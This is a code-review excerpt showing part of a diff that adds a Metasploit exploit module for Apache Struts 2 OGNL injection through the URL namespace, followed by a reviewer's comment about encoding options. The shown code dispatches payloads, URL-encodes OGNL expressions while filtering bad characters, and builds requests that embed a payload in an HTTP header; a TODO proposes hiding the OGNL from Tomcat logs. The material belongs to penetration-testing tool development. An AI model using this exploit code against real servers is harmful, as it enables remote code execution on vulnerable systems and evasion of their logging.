modules/exploits/multi/http/struts2_namespace_ognl.rb

```diff
@@ -0,0 +1,337 @@
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    case payload.arch.first
+    when ARCH_CMD
+      resp = execute_command(payload.encoded)
+    else
+      # fail_with(Failure::BadConfig,"Only cmd payloads are currently supported.")
+      resp = send_payload()
+    end
+  end
+
+  def encode_ognl(ognl, string_delimiter:"'")
+    # Check and fail if the command contains the follow bad characters:
+    #   ';' seems to terminates the OGNL statement
+    #   '/' causes the target to return an HTTP/400 error
+    #   '\' causes the target to return an HTTP/400 error (sometimes?)
+    #   '\r' ends the GET request prematurely
+    #   '\n' ends the GET request prematurely
+
+    # TODO: Make sure the following line is uncommented
+    bad_chars = [';','\\','\r','\n']    # and maybe '/'
+    bad_chars.each do |c|
+      if ognl.include?c
+        print_error("Bad OGNL request: #{ognl}")
+        fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
+      end
+    end
+    
+    # The following list of characters *must* be encoded or ORNL will asplode
+    encodable_chars = { "%": "%25",       # Always do this one first.  :-)
+                        " ": "%20",
+                        "\"":"%22",
+                        "#": "%23",
+                        "'": "%27",
+                        "<": "%3c",
+                        ">": "%3e",
+                        "?": "%3f",
+                        "^": "%5e",
+                        "`": "%60",
+                        "{": "%7b",
+                        "|": "%7c",
+                        "}": "%7d",
+                       #"\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
+                       #";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
+                      }
+
+    encodable_chars.each do |k,v|
+     #print_status("   #{k} -> #{v}")
+     #ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
+      ognl.gsub!("#{k}","#{v}")
+    end
+    return ognl
+  end
+
+  def send_struts_request(ognl, payload: nil)
+
+=begin  #badchar-checking code
+    pre = ognl
+=end
+
+    ognl = "${#{ognl}}"
+    vprint_status("Submitted OGNL: #{ognl}")
+    ognl = encode_ognl(ognl)
+
+    headers = {'Keep-Alive': 'timeout=5, max=1000'}
+
+    unless payload.nil?
+      vprint_status("Embedding payload of #{payload.length} bytes")
+      headers[datastore['HEADER']] = payload
+    end
+
+    # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs
+    uri = "/#{ognl}/#{datastore['ACTION']}"
+
+    resp = send_request_cgi(
+     #'encode'  => true,     # this fails to encode '\', which is a problem for me
```

Comment:
That's a shame. Maybe we can improve it later. I'd start with `hex-noslashes`.

https://github.com/rapid7/metasploit-framework/blob/d25aad571f88717b91882d820bc833f69c907e4b/lib/rex/proto/http/client_request.rb#L43